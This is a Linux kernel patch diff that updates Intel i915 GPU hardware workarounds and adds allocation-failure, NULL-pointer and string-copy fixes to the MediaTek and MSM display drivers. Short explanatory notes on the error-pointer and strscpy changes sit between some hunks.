+ 	if (IS_PONTEVECCHIO(i915)) {
+-		wa_write(wal, XEHPC_L3SCRUB,
+-			 SCRUB_CL_DWNGRADE_SHARED | SCRUB_RATE_4B_PER_CLK);
++		wa_mcr_write(wal, XEHPC_L3SCRUB,
++			     SCRUB_CL_DWNGRADE_SHARED | SCRUB_RATE_4B_PER_CLK);
++		wa_mcr_masked_en(wal, XEHPC_LNCFMISCCFGREG0, XEHPC_HOSTCACHEEN);
+ 	}
+ 
+ 	if (IS_DG2(i915)) {
+@@ -2950,9 +3035,24 @@ general_render_compute_wa_init(struct intel_engine_cs *engine, struct i915_wa_li
+ 
+ 	add_render_compute_tuning_settings(i915, wal);
+ 
++	if (IS_MTL_GRAPHICS_STEP(i915, M, STEP_A0, STEP_B0) ||
++	    IS_MTL_GRAPHICS_STEP(i915, P, STEP_A0, STEP_B0) ||
++	    IS_PONTEVECCHIO(i915) ||
++	    IS_DG2(i915)) {
++		/* Wa_22014226127 */
++		wa_mcr_write_or(wal, LSC_CHICKEN_BIT_0, DISABLE_D8_D16_COASLESCE);
++	}
++
++	if (IS_MTL_GRAPHICS_STEP(i915, M, STEP_A0, STEP_B0) ||
++	    IS_MTL_GRAPHICS_STEP(i915, P, STEP_A0, STEP_B0) ||
++	    IS_DG2(i915)) {
++		/* Wa_18017747507 */
++		wa_masked_en(wal, VFG_PREEMPTION_CHICKEN, POLYGON_TRIFAN_LINELOOP_DISABLE);
++	}
++
+ 	if (IS_PONTEVECCHIO(i915)) {
+ 		/* Wa_16016694945 */
+-		wa_masked_en(wal, XEHPC_LNCFMISCCFGREG0, XEHPC_OVRLSCCC);
++		wa_mcr_masked_en(wal, XEHPC_LNCFMISCCFGREG0, XEHPC_OVRLSCCC);
+ 	}
+ 
+ 	if (IS_XEHPSDV(i915)) {
+@@ -2978,30 +3078,14 @@ general_render_compute_wa_init(struct intel_engine_cs *engine, struct i915_wa_li
+ 			wa_mcr_masked_dis(wal, MLTICTXCTL, TDONRENDER);
+ 			wa_mcr_write_or(wal, L3SQCREG1_CCS0, FLUSHALLNONCOH);
+ 		}
+-
+-		/* Wa_14012362059:xehpsdv */
+-		wa_mcr_write_or(wal, XEHP_MERT_MOD_CTRL, FORCE_MISS_FTLB);
+-
+-		/* Wa_14014368820:xehpsdv */
+-		wa_write_or(wal, GEN12_GAMCNTRL_CTRL, INVALIDATION_BROADCAST_MODE_DIS |
+-				GLOBAL_INVALIDATION_MODE);
+ 	}
+ 
+ 	if (IS_DG2(i915) || IS_PONTEVECCHIO(i915)) {
+ 		/* Wa_14015227452:dg2,pvc */
+ 		wa_mcr_masked_en(wal, GEN9_ROW_CHICKEN4, XEHP_DIS_BBL_SYSPIPE);
+ 
+-		/* Wa_22014226127:dg2,pvc */
+-		wa_mcr_write_or(wal, LSC_CHICKEN_BIT_0, DISABLE_D8_D16_COASLESCE);
+-
+ 		/* Wa_16015675438:dg2,pvc */
+ 		wa_masked_en(wal, FF_SLICE_CS_CHICKEN2, GEN12_PERF_FIX_BALANCING_CFE_DISABLE);
+-
+-		/* Wa_18018781329:dg2,pvc */
+-		wa_mcr_write_or(wal, RENDER_MOD_CTRL, FORCE_MISS_FTLB);
+-		wa_mcr_write_or(wal, COMP_MOD_CTRL, FORCE_MISS_FTLB);
+-		wa_mcr_write_or(wal, VDBX_MOD_CTRL, FORCE_MISS_FTLB);
+-		wa_mcr_write_or(wal, VEBX_MOD_CTRL, FORCE_MISS_FTLB);
+ 	}
+ 
+ 	if (IS_DG2(i915)) {
+@@ -3010,9 +3094,6 @@ general_render_compute_wa_init(struct intel_engine_cs *engine, struct i915_wa_li
+ 		 * Wa_22015475538:dg2
+ 		 */
+ 		wa_mcr_write_or(wal, LSC_CHICKEN_BIT_0_UDW, DIS_CHAIN_2XSIMD8);
+-
+-		/* Wa_18017747507:dg2 */
+-		wa_masked_en(wal, VFG_PREEMPTION_CHICKEN, POLYGON_TRIFAN_LINELOOP_DISABLE);
+ 	}
+ }
+ 
+diff --git a/drivers/gpu/drm/i915/gt/uc/intel_guc.c b/drivers/gpu/drm/i915/gt/uc/intel_guc.c
+index 52aede324788e..ca940a00e84a3 100644
+--- a/drivers/gpu/drm/i915/gt/uc/intel_guc.c
++++ b/drivers/gpu/drm/i915/gt/uc/intel_guc.c
+@@ -274,8 +274,9 @@ static u32 guc_ctl_wa_flags(struct intel_guc *guc)
+ 	if (IS_DG2_GRAPHICS_STEP(gt->i915, G10, STEP_A0, STEP_B0))
+ 		flags |= GUC_WA_GAM_CREDITS;
+ 
+-	/* Wa_14014475959:dg2 */
+-	if (IS_DG2(gt->i915))
++	/* Wa_14014475959 */
++	if (IS_MTL_GRAPHICS_STEP(gt->i915, M, STEP_A0, STEP_B0) ||
++	    IS_DG2(gt->i915))
+ 		flags |= GUC_WA_HOLD_CCS_SWITCHOUT;
+ 
+ 	/*
+@@ -289,7 +290,9 @@ static u32 guc_ctl_wa_flags(struct intel_guc *guc)
+ 		flags |= GUC_WA_DUAL_QUEUE;
+ 
+ 	/* Wa_22011802037: graphics version 11/12 */
+-	if (IS_GRAPHICS_VER(gt->i915, 11, 12))
++	if (IS_MTL_GRAPHICS_STEP(gt->i915, M, STEP_A0, STEP_B0) ||
++	    (GRAPHICS_VER(gt->i915) >= 11 &&
++	    GRAPHICS_VER_FULL(gt->i915) < IP_VER(12, 70)))
+ 		flags |= GUC_WA_PRE_PARSER;
+ 
+ 	/* Wa_16011777198:dg2 */
+diff --git a/drivers/gpu/drm/i915/gt/uc/intel_guc_fw.c b/drivers/gpu/drm/i915/gt/uc/intel_guc_fw.c
+index 5b86b2e286e07..42c5d9d2e2182 100644
+--- a/drivers/gpu/drm/i915/gt/uc/intel_guc_fw.c
++++ b/drivers/gpu/drm/i915/gt/uc/intel_guc_fw.c
+@@ -38,9 +38,8 @@ static void guc_prepare_xfer(struct intel_gt *gt)
+ 
+ 	if (GRAPHICS_VER(uncore->i915) == 9) {
+ 		/* DOP Clock Gating Enable for GuC clocks */
+-		intel_gt_mcr_multicast_write(gt, GEN8_MISCCPCTL,
+-					     GEN8_DOP_CLOCK_GATE_GUC_ENABLE |
+-					     intel_gt_mcr_read_any(gt, GEN8_MISCCPCTL));
++		intel_uncore_rmw(uncore, GEN7_MISCCPCTL, 0,
++				 GEN8_DOP_CLOCK_GATE_GUC_ENABLE);
+ 
+ 		/* allows for 5us (in 10ns units) before GT can go to RC6 */
+ 		intel_uncore_write(uncore, GUC_ARAT_C6DIS, 0x1FF);
+diff --git a/drivers/gpu/drm/i915/gt/uc/intel_guc_submission.c b/drivers/gpu/drm/i915/gt/uc/intel_guc_submission.c
+index c10977cb06b97..ddf071865adc5 100644
+--- a/drivers/gpu/drm/i915/gt/uc/intel_guc_submission.c
++++ b/drivers/gpu/drm/i915/gt/uc/intel_guc_submission.c
+@@ -1621,7 +1621,7 @@ static void guc_engine_reset_prepare(struct intel_engine_cs *engine)
+ 	intel_engine_stop_cs(engine);
+ 
+ 	/*
+-	 * Wa_22011802037:gen11/gen12: In addition to stopping the cs, we need
++	 * Wa_22011802037: In addition to stopping the cs, we need
+ 	 * to wait for any pending mi force wakeups
+ 	 */
+ 	intel_engine_wait_for_pending_mi_fw(engine);
+@@ -4203,8 +4203,10 @@ static void guc_default_vfuncs(struct intel_engine_cs *engine)
+ 	engine->flags |= I915_ENGINE_HAS_TIMESLICES;
+ 
+ 	/* Wa_14014475959:dg2 */
+-	if (IS_DG2(engine->i915) && engine->class == COMPUTE_CLASS)
+-		engine->flags |= I915_ENGINE_USES_WA_HOLD_CCS_SWITCHOUT;
++	if (engine->class == COMPUTE_CLASS)
++		if (IS_MTL_GRAPHICS_STEP(engine->i915, M, STEP_A0, STEP_B0) ||
++		    IS_DG2(engine->i915))
++			engine->flags |= I915_ENGINE_USES_WA_HOLD_CCS_SWITCHOUT;
+ 
+ 	/*
+ 	 * TODO: GuC supports timeslicing and semaphores as well, but they're
+diff --git a/drivers/gpu/drm/i915/i915_drv.h b/drivers/gpu/drm/i915/i915_drv.h
+index a380db36d52c4..03c3a59d0939b 100644
+--- a/drivers/gpu/drm/i915/i915_drv.h
++++ b/drivers/gpu/drm/i915/i915_drv.h
+@@ -726,6 +726,10 @@ IS_SUBPLATFORM(const struct drm_i915_private *i915,
+ 	(IS_SUBPLATFORM(__i915, INTEL_METEORLAKE, INTEL_SUBPLATFORM_##variant) && \
+ 	 IS_GRAPHICS_STEP(__i915, since, until))
+ 
++#define IS_MTL_MEDIA_STEP(__i915, since, until) \
++	(IS_METEORLAKE(__i915) && \
++	 IS_MEDIA_STEP(__i915, since, until))
++
+ /*
+  * DG2 hardware steppings are a bit unusual.  The hardware design was forked to
+  * create three variants (G10, G11, and G12) which each have distinct
+diff --git a/drivers/gpu/drm/i915/intel_device_info.c b/drivers/gpu/drm/i915/intel_device_info.c
+index 849baf6c3b3c6..05e90d09b2081 100644
+--- a/drivers/gpu/drm/i915/intel_device_info.c
++++ b/drivers/gpu/drm/i915/intel_device_info.c
+@@ -343,6 +343,12 @@ static void intel_ipver_early_init(struct drm_i915_private *i915)
+ 
+ 	ip_ver_read(i915, i915_mmio_reg_offset(GMD_ID_GRAPHICS),
+ 		    &runtime->graphics.ip);
++	/* Wa_22012778468 */
++	if (runtime->graphics.ip.ver == 0x0 &&
++	    INTEL_INFO(i915)->platform == INTEL_METEORLAKE) {
++		RUNTIME_INFO(i915)->graphics.ip.ver = 12;
++		RUNTIME_INFO(i915)->graphics.ip.rel = 70;
++	}
+ 	ip_ver_read(i915, i915_mmio_reg_offset(GMD_ID_DISPLAY),
+ 		    &runtime->display.ip);
+ 	ip_ver_read(i915, i915_mmio_reg_offset(GMD_ID_MEDIA),
+diff --git a/drivers/gpu/drm/i915/intel_pm.c b/drivers/gpu/drm/i915/intel_pm.c
+index 73c88b1c9545c..ac61df46d02c5 100644
+--- a/drivers/gpu/drm/i915/intel_pm.c
++++ b/drivers/gpu/drm/i915/intel_pm.c
+@@ -4299,8 +4299,8 @@ static void gen8_set_l3sqc_credits(struct drm_i915_private *dev_priv,
+ 	u32 val;
+ 
+ 	/* WaTempDisableDOPClkGating:bdw */
+-	misccpctl = intel_gt_mcr_multicast_rmw(to_gt(dev_priv), GEN8_MISCCPCTL,
+-					       GEN8_DOP_CLOCK_GATE_ENABLE, 0);
++	misccpctl = intel_uncore_rmw(&dev_priv->uncore, GEN7_MISCCPCTL,
++				     GEN7_DOP_CLOCK_GATE_ENABLE, 0);
+ 
+ 	val = intel_gt_mcr_read_any(to_gt(dev_priv), GEN8_L3SQCREG1);
+ 	val &= ~L3_PRIO_CREDITS_MASK;
+@@ -4314,7 +4314,7 @@ static void gen8_set_l3sqc_credits(struct drm_i915_private *dev_priv,
+ 	 */
+ 	intel_gt_mcr_read_any(to_gt(dev_priv), GEN8_L3SQCREG1);
+ 	udelay(1);
+-	intel_gt_mcr_multicast_write(to_gt(dev_priv), GEN8_MISCCPCTL, misccpctl);
++	intel_uncore_write(&dev_priv->uncore, GEN7_MISCCPCTL, misccpctl);
+ }
+ 
+ static void icl_init_clock_gating(struct drm_i915_private *dev_priv)
+@@ -4465,8 +4465,8 @@ static void skl_init_clock_gating(struct drm_i915_private *dev_priv)
+ 	gen9_init_clock_gating(dev_priv);
+ 
+ 	/* WaDisableDopClockGating:skl */
+-	intel_gt_mcr_multicast_rmw(to_gt(dev_priv), GEN8_MISCCPCTL,
+-				   GEN8_DOP_CLOCK_GATE_ENABLE, 0);
++	intel_uncore_rmw(&dev_priv->uncore, GEN7_MISCCPCTL,
++			 GEN7_DOP_CLOCK_GATE_ENABLE, 0);
+ 
+ 	/* WAC6entrylatency:skl */
+ 	intel_uncore_rmw(&dev_priv->uncore, FBC_LLC_READ_CTRL, 0, FBC_LLC_FULLY_OPEN);
+diff --git a/drivers/gpu/drm/mediatek/mtk_drm_crtc.c b/drivers/gpu/drm/mediatek/mtk_drm_crtc.c
+index 112615817dcbe..5071f1263216b 100644
+--- a/drivers/gpu/drm/mediatek/mtk_drm_crtc.c
++++ b/drivers/gpu/drm/mediatek/mtk_drm_crtc.c
+@@ -945,6 +945,8 @@ int mtk_drm_crtc_create(struct drm_device *drm_dev,
+ 
+ 	mtk_crtc->planes = devm_kcalloc(dev, num_comp_planes,
+ 					sizeof(struct drm_plane), GFP_KERNEL);
++	if (!mtk_crtc->planes)
++		return -ENOMEM;
+ 
+ 	for (i = 0; i < mtk_crtc->ddp_comp_nr; i++) {
+ 		ret = mtk_drm_crtc_init_comp_planes(drm_dev, mtk_crtc, i,
+diff --git a/drivers/gpu/drm/mediatek/mtk_drm_drv.c b/drivers/gpu/drm/mediatek/mtk_drm_drv.c
+index cd5b18ef79512..d3e57dd79f5f5 100644
+--- a/drivers/gpu/drm/mediatek/mtk_drm_drv.c
++++ b/drivers/gpu/drm/mediatek/mtk_drm_drv.c
+@@ -520,6 +520,7 @@ static int mtk_drm_bind(struct device *dev)
+ err_deinit:
+ 	mtk_drm_kms_deinit(drm);
+ err_free:
++	private->drm = NULL;
+ 	drm_dev_put(drm);
+ 	return ret;
+ }
+diff --git a/drivers/gpu/drm/mediatek/mtk_drm_gem.c b/drivers/gpu/drm/mediatek/mtk_drm_gem.c
+index 47e96b0289f98..6c204ccfb9ece 100644
+--- a/drivers/gpu/drm/mediatek/mtk_drm_gem.c
++++ b/drivers/gpu/drm/mediatek/mtk_drm_gem.c
+@@ -164,8 +164,6 @@ static int mtk_drm_gem_object_mmap(struct drm_gem_object *obj,
+ 
+ 	ret = dma_mmap_attrs(priv->dma_dev, vma, mtk_gem->cookie,
+ 			     mtk_gem->dma_addr, obj->size, mtk_gem->dma_attrs);
+-	if (ret)
+-		drm_gem_vm_close(vma);
+ 
+ 	return ret;
+ }
+@@ -262,6 +260,6 @@ void mtk_drm_gem_prime_vunmap(struct drm_gem_object *obj,
+ 		return;
+ 
+ 	vunmap(vaddr);
+-	mtk_gem->kvaddr = 0;
++	mtk_gem->kvaddr = NULL;
+ 	kfree(mtk_gem->pages);
+ }
+diff --git a/drivers/gpu/drm/mediatek/mtk_dsi.c b/drivers/gpu/drm/mediatek/mtk_dsi.c
+index 3b7d13028fb6b..9e1363c9fcdb4 100644
+--- a/drivers/gpu/drm/mediatek/mtk_dsi.c
++++ b/drivers/gpu/drm/mediatek/mtk_dsi.c
+@@ -721,7 +721,7 @@ static void mtk_dsi_lane_ready(struct mtk_dsi *dsi)
+ 		mtk_dsi_clk_ulp_mode_leave(dsi);
+ 		mtk_dsi_lane0_ulp_mode_leave(dsi);
+ 		mtk_dsi_clk_hs_mode(dsi, 0);
+-		msleep(20);
++		usleep_range(1000, 3000);
+ 		/* The reaction time after pulling up the mipi signal for dsi_rx */
+ 	}
+ }
+diff --git a/drivers/gpu/drm/msm/adreno/adreno_gpu.c b/drivers/gpu/drm/msm/adreno/adreno_gpu.c
+index 3605f095b2de2..8175997663299 100644
+--- a/drivers/gpu/drm/msm/adreno/adreno_gpu.c
++++ b/drivers/gpu/drm/msm/adreno/adreno_gpu.c
+@@ -1083,13 +1083,13 @@ int adreno_gpu_init(struct drm_device *drm, struct platform_device *pdev,
+ void adreno_gpu_cleanup(struct adreno_gpu *adreno_gpu)
+ {
+ 	struct msm_gpu *gpu = &adreno_gpu->base;
+-	struct msm_drm_private *priv = gpu->dev->dev_private;
++	struct msm_drm_private *priv = gpu->dev ? gpu->dev->dev_private : NULL;
+ 	unsigned int i;
+ 
+ 	for (i = 0; i < ARRAY_SIZE(adreno_gpu->info->fw); i++)
+ 		release_firmware(adreno_gpu->fw[i]);
+ 
+-	if (pm_runtime_enabled(&priv->gpu_pdev->dev))
++	if (priv && pm_runtime_enabled(&priv->gpu_pdev->dev))
+ 		pm_runtime_disable(&priv->gpu_pdev->dev);
+ 
+ 	msm_gpu_cleanup(&adreno_gpu->base);
+diff --git a/drivers/gpu/drm/msm/disp/dpu1/dpu_crtc.c b/drivers/gpu/drm/msm/disp/dpu1/dpu_crtc.c
+index 13ce321283ff9..c9d1c412628e9 100644
+--- a/drivers/gpu/drm/msm/disp/dpu1/dpu_crtc.c
++++ b/drivers/gpu/drm/msm/disp/dpu1/dpu_crtc.c
+@@ -968,7 +968,10 @@ static void dpu_crtc_reset(struct drm_crtc *crtc)
+ 	if (crtc->state)
+ 		dpu_crtc_destroy_state(crtc, crtc->state);
+ 
+-	__drm_atomic_helper_crtc_reset(crtc, &cstate->base);
++	if (cstate)
++		__drm_atomic_helper_crtc_reset(crtc, &cstate->base);
++	else
++		__drm_atomic_helper_crtc_reset(crtc, NULL);
+ }
+ 
+ /**
+@@ -1150,6 +1153,8 @@ static int dpu_crtc_atomic_check(struct drm_crtc *crtc,
+ 	bool needs_dirtyfb = dpu_crtc_needs_dirtyfb(crtc_state);
+ 
+ 	pstates = kzalloc(sizeof(*pstates) * DPU_STAGE_MAX * 4, GFP_KERNEL);
++	if (!pstates)
++		return -ENOMEM;
+ 
+ 	if (!crtc_state->enable || !crtc_state->active) {
+ 		DRM_DEBUG_ATOMIC("crtc%d -> enable %d, active %d, skip atomic_check\n",
+diff --git a/drivers/gpu/drm/msm/disp/dpu1/dpu_hw_catalog.c b/drivers/gpu/drm/msm/disp/dpu1/dpu_hw_catalog.c
+index 2196e205efa5e..83f1dd2c22bd7 100644
+--- a/drivers/gpu/drm/msm/disp/dpu1/dpu_hw_catalog.c
++++ b/drivers/gpu/drm/msm/disp/dpu1/dpu_hw_catalog.c
+@@ -459,6 +459,8 @@ static const struct dpu_mdp_cfg sc7180_mdp[] = {
+ 		.reg_off = 0x2B4, .bit_off = 8},
+ 	.clk_ctrls[DPU_CLK_CTRL_CURSOR1] = {
+ 		.reg_off = 0x2C4, .bit_off = 8},
++	.clk_ctrls[DPU_CLK_CTRL_WB2] = {
++		.reg_off = 0x3B8, .bit_off = 24},
+ 	},
+ };
+ 
+diff --git a/drivers/gpu/drm/msm/disp/dpu1/dpu_kms.c b/drivers/gpu/drm/msm/disp/dpu1/dpu_kms.c
+index b71199511a52d..09757166a064a 100644
+--- a/drivers/gpu/drm/msm/disp/dpu1/dpu_kms.c
++++ b/drivers/gpu/drm/msm/disp/dpu1/dpu_kms.c
+@@ -930,6 +930,11 @@ static void dpu_kms_mdp_snapshot(struct msm_disp_state *disp_state, struct msm_k
+ 	msm_disp_snapshot_add_block(disp_state, cat->mdp[0].len,
+ 			dpu_kms->mmio + cat->mdp[0].base, "top");
+ 
++	/* dump DSC sub-blocks HW regs info */
++	for (i = 0; i < cat->dsc_count; i++)
++		msm_disp_snapshot_add_block(disp_state, cat->dsc[i].len,
++				dpu_kms->mmio + cat->dsc[i].base, "dsc_%d", i);
++
+ 	pm_runtime_put_sync(&dpu_kms->pdev->dev);
+ }
+ 
+diff --git a/drivers/gpu/drm/msm/disp/dpu1/dpu_plane.c b/drivers/gpu/drm/msm/disp/dpu1/dpu_plane.c
+index 86719020afe20..bfd5be89e8b8d 100644
+--- a/drivers/gpu/drm/msm/disp/dpu1/dpu_plane.c
++++ b/drivers/gpu/drm/msm/disp/dpu1/dpu_plane.c
+@@ -1126,7 +1126,7 @@ static void dpu_plane_sspp_atomic_update(struct drm_plane *plane)
+ 	struct dpu_plane_state *pstate = to_dpu_plane_state(state);
+ 	struct drm_crtc *crtc = state->crtc;
+ 	struct drm_framebuffer *fb = state->fb;
+-	bool is_rt_pipe, update_qos_remap;
++	bool is_rt_pipe;
+ 	const struct dpu_format *fmt =
+ 		to_dpu_format(msm_framebuffer_format(fb));
+ 	struct dpu_hw_pipe_cfg pipe_cfg;
+@@ -1138,6 +1138,9 @@ static void dpu_plane_sspp_atomic_update(struct drm_plane *plane)
+ 	pstate->pending = true;
+ 
+ 	is_rt_pipe = (dpu_crtc_get_client_type(crtc) != NRT_CLIENT);
++	pstate->needs_qos_remap |= (is_rt_pipe != pdpu->is_rt_pipe);
++	pdpu->is_rt_pipe = is_rt_pipe;
++
+ 	_dpu_plane_set_qos_ctrl(plane, false, DPU_PLANE_QOS_PANIC_CTRL);
+ 
+ 	DPU_DEBUG_PLANE(pdpu, "FB[%u] " DRM_RECT_FP_FMT "->crtc%u " DRM_RECT_FMT
+@@ -1219,14 +1222,8 @@ static void dpu_plane_sspp_atomic_update(struct drm_plane *plane)
+ 		_dpu_plane_set_ot_limit(plane, crtc, &pipe_cfg);
+ 	}
+ 
+-	update_qos_remap = (is_rt_pipe != pdpu->is_rt_pipe) ||
+-			pstate->needs_qos_remap;
+-
+-	if (update_qos_remap) {
+-		if (is_rt_pipe != pdpu->is_rt_pipe)
+-			pdpu->is_rt_pipe = is_rt_pipe;
+-		else if (pstate->needs_qos_remap)
+-			pstate->needs_qos_remap = false;
++	if (pstate->needs_qos_remap) {
++		pstate->needs_qos_remap = false;
+ 		_dpu_plane_set_qos_remap(plane);
+ 	}
+ 
+diff --git a/drivers/gpu/drm/msm/disp/dpu1/dpu_rm.c b/drivers/gpu/drm/msm/disp/dpu1/dpu_rm.c
+index 73b3442e74679..7ada957adbbb8 100644
+--- a/drivers/gpu/drm/msm/disp/dpu1/dpu_rm.c
++++ b/drivers/gpu/drm/msm/disp/dpu1/dpu_rm.c
+@@ -660,6 +660,11 @@ int dpu_rm_get_assigned_resources(struct dpu_rm *rm,
+ 				  blks_size, enc_id);
+ 			break;
+ 		}
++		if (!hw_blks[i]) {
++			DPU_ERROR("Allocated resource %d unavailable to assign to enc %d\n",
++				  type, enc_id);
++			break;
++		}
+ 		blks[num_blks++] = hw_blks[i];
+ 	}
+ 
+diff --git a/drivers/gpu/drm/msm/disp/dpu1/dpu_writeback.c b/drivers/gpu/drm/msm/disp/dpu1/dpu_writeback.c
+index 088ec990a2f26..2a5a68366582b 100644
+--- a/drivers/gpu/drm/msm/disp/dpu1/dpu_writeback.c
++++ b/drivers/gpu/drm/msm/disp/dpu1/dpu_writeback.c
+@@ -70,6 +70,8 @@ int dpu_writeback_init(struct drm_device *dev, struct drm_encoder *enc,
+ 	int rc = 0;
+ 
+ 	dpu_wb_conn = devm_kzalloc(dev->dev, sizeof(*dpu_wb_conn), GFP_KERNEL);
++	if (!dpu_wb_conn)
++		return -ENOMEM;
+ 
+ 	drm_connector_helper_add(&dpu_wb_conn->base.base, &dpu_wb_conn_helper_funcs);
+ 
+diff --git a/drivers/gpu/drm/msm/disp/mdp5/mdp5_crtc.c b/drivers/gpu/drm/msm/disp/mdp5/mdp5_crtc.c
+index e86421c69bd1f..86036dd4e1e82 100644
+--- a/drivers/gpu/drm/msm/disp/mdp5/mdp5_crtc.c
++++ b/drivers/gpu/drm/msm/disp/mdp5/mdp5_crtc.c
+@@ -1139,7 +1139,10 @@ static void mdp5_crtc_reset(struct drm_crtc *crtc)
+ 	if (crtc->state)
+ 		mdp5_crtc_destroy_state(crtc, crtc->state);
+ 
+-	__drm_atomic_helper_crtc_reset(crtc, &mdp5_cstate->base);
++	if (mdp5_cstate)
++		__drm_atomic_helper_crtc_reset(crtc, &mdp5_cstate->base);
++	else
++		__drm_atomic_helper_crtc_reset(crtc, NULL);
+ }
+ 
+ static const struct drm_crtc_funcs mdp5_crtc_no_lm_cursor_funcs = {
+diff --git a/drivers/gpu/drm/msm/dsi/dsi_cfg.c b/drivers/gpu/drm/msm/dsi/dsi_cfg.c
+index 7e97c239ed489..e0bd452a9f1e6 100644
+--- a/drivers/gpu/drm/msm/dsi/dsi_cfg.c
++++ b/drivers/gpu/drm/msm/dsi/dsi_cfg.c
+@@ -209,8 +209,8 @@ static const struct msm_dsi_config sc7280_dsi_cfg = {
+ 	.num_regulators = ARRAY_SIZE(sc7280_dsi_regulators),
+ 	.bus_clk_names = dsi_sc7280_bus_clk_names,
+ 	.num_bus_clks = ARRAY_SIZE(dsi_sc7280_bus_clk_names),
+-	.io_start = { 0xae94000 },
+-	.num_dsi = 1,
++	.io_start = { 0xae94000, 0xae96000 },
++	.num_dsi = 2,
+ };
+ 
+ static const char * const dsi_qcm2290_bus_clk_names[] = {
+diff --git a/drivers/gpu/drm/msm/dsi/dsi_host.c b/drivers/gpu/drm/msm/dsi/dsi_host.c
+index 89aadd3b3202b..f167a45f1fbdd 100644
+--- a/drivers/gpu/drm/msm/dsi/dsi_host.c
++++ b/drivers/gpu/drm/msm/dsi/dsi_host.c
+@@ -1977,6 +1977,9 @@ int msm_dsi_host_init(struct msm_dsi *msm_dsi)
+ 
+ 	/* setup workqueue */
+ 	msm_host->workqueue = alloc_ordered_workqueue("dsi_drm_work", 0);
++	if (!msm_host->workqueue)
++		return -ENOMEM;
++
+ 	INIT_WORK(&msm_host->err_work, dsi_err_worker);
+ 
+ 	msm_dsi->id = msm_host->id;
+diff --git a/drivers/gpu/drm/msm/hdmi/hdmi.c b/drivers/gpu/drm/msm/hdmi/hdmi.c
+index 97372bb241d89..4ad36bc8fe5ed 100644
+--- a/drivers/gpu/drm/msm/hdmi/hdmi.c
++++ b/drivers/gpu/drm/msm/hdmi/hdmi.c
+@@ -120,6 +120,10 @@ static int msm_hdmi_init(struct hdmi *hdmi)
+ 	int ret;
+ 
+ 	hdmi->workq = alloc_ordered_workqueue("msm_hdmi", 0);
++	if (!hdmi->workq) {
++		ret = -ENOMEM;
++		goto fail;
++	}
+ 
+ 	hdmi->i2c = msm_hdmi_i2c_init(hdmi);
+ 	if (IS_ERR(hdmi->i2c)) {
+diff --git a/drivers/gpu/drm/msm/msm_drv.c b/drivers/gpu/drm/msm/msm_drv.c
+index 45e81eb148a8d..ee2f60b6f09b3 100644
+--- a/drivers/gpu/drm/msm/msm_drv.c
++++ b/drivers/gpu/drm/msm/msm_drv.c
+@@ -491,7 +491,7 @@ static int msm_drm_init(struct device *dev, const struct drm_driver *drv)
+ 		if (IS_ERR(priv->event_thread[i].worker)) {
+ 			ret = PTR_ERR(priv->event_thread[i].worker);
+ 			DRM_DEV_ERROR(dev, "failed to create crtc_event kthread\n");
+-			ret = PTR_ERR(priv->event_thread[i].worker);
++			priv->event_thread[i].worker = NULL;
+ 			goto err_msm_uninit;
+ 		}
+ 
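
The msm_drv.c hunk above replaces a duplicated PTR_ERR() assignment with
clearing the pointer: once IS_ERR() has fired, the error-encoded value must
not be left in place, or later cleanup code may dereference it. The shape of
the pattern, as a sketch (all names are illustrative):

	#include <linux/err.h>
	#include <linux/kthread.h>

	static struct kthread_worker *event_worker;	/* illustrative */

	static int example_start(void)
	{
		struct kthread_worker *worker;

		worker = kthread_create_worker(0, "example_event");
		if (IS_ERR(worker)) {
			int ret = PTR_ERR(worker);	/* record the errno once */

			event_worker = NULL;	/* cleanup can test for NULL */
			return ret;
		}

		event_worker = worker;
		return 0;
	}
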
+diff --git a/drivers/gpu/drm/msm/msm_fence.c b/drivers/gpu/drm/msm/msm_fence.c
+index a47e5837c528f..56641408ea742 100644
+--- a/drivers/gpu/drm/msm/msm_fence.c
++++ b/drivers/gpu/drm/msm/msm_fence.c
+@@ -22,7 +22,7 @@ msm_fence_context_alloc(struct drm_device *dev, volatile uint32_t *fenceptr,
+ 		return ERR_PTR(-ENOMEM);
+ 
+ 	fctx->dev = dev;
+-	strncpy(fctx->name, name, sizeof(fctx->name));
++	strscpy(fctx->name, name, sizeof(fctx->name));
+ 	fctx->context = dma_fence_context_alloc(1);
+ 	fctx->index = index++;
+ 	fctx->fenceptr = fenceptr;
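
The strscpy() conversion above is more than style: with a source string at
least as long as the destination, strncpy() fills the whole buffer without a
terminating NUL, so a later read of fctx->name can run past the array.
strscpy() always NUL-terminates and reports truncation. A small sketch
(buffer size and string are made up):

	#include <linux/string.h>

	static void name_copy_example(void)
	{
		char name[8];

		strncpy(name, "gpu-fctx-long", sizeof(name));
		/* name holds 8 non-NUL bytes: reading it as a C string
		 * walks off the end of the array. */

		strscpy(name, "gpu-fctx-long", sizeof(name));
		/* name == "gpu-fct" + '\0'; the call returns -E2BIG
		 * to signal the truncation. */
	}
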
+diff --git a/drivers/gpu/drm/msm/msm_gem_submit.c b/drivers/gpu/drm/msm/msm_gem_submit.c
+index 73a2ca122c570..1c4be193fd23f 100644
+--- a/drivers/gpu/drm/msm/msm_gem_submit.c
++++ b/drivers/gpu/drm/msm/msm_gem_submit.c
+@@ -209,6 +209,10 @@ static int submit_lookup_cmds(struct msm_gem_submit *submit,
+ 			goto out;
+ 		}
+ 		submit->cmd[i].relocs = kmalloc(sz, GFP_KERNEL);
++		if (!submit->cmd[i].relocs) {
++			ret = -ENOMEM;
++			goto out;
++		}
+ 		ret = copy_from_user(submit->cmd[i].relocs, userptr, sz);
+ 		if (ret) {
+ 			ret = -EFAULT;
+diff --git a/drivers/gpu/drm/mxsfb/Kconfig b/drivers/gpu/drm/mxsfb/Kconfig
+index 116f8168bda4a..518b533453548 100644
+--- a/drivers/gpu/drm/mxsfb/Kconfig
++++ b/drivers/gpu/drm/mxsfb/Kconfig
+@@ -8,6 +8,7 @@ config DRM_MXSFB
+ 	tristate "i.MX (e)LCDIF LCD controller"
+ 	depends on DRM && OF
+ 	depends on COMMON_CLK
++	depends on ARCH_MXS || ARCH_MXC || COMPILE_TEST
+ 	select DRM_MXS
+ 	select DRM_KMS_HELPER
+ 	select DRM_GEM_DMA_HELPER
+@@ -24,6 +25,7 @@ config DRM_IMX_LCDIF
+ 	tristate "i.MX LCDIFv3 LCD controller"
+ 	depends on DRM && OF
+ 	depends on COMMON_CLK
++	depends on ARCH_MXC || COMPILE_TEST
+ 	select DRM_MXS
+ 	select DRM_KMS_HELPER
+ 	select DRM_GEM_DMA_HELPER
+diff --git a/drivers/gpu/drm/nouveau/include/nvif/outp.h b/drivers/gpu/drm/nouveau/include/nvif/outp.h
+index 45daadec3c0c7..fa76a7b5e4b37 100644
+--- a/drivers/gpu/drm/nouveau/include/nvif/outp.h
++++ b/drivers/gpu/drm/nouveau/include/nvif/outp.h
